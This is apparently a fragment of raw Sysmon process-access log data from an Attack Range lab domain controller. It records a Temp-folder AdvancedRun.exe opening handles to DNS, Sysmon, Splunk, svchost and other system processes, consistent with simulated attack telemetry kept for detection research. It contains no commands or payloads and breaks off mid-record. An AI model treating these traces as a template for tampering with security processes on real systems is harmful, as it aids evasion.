20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004069001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedR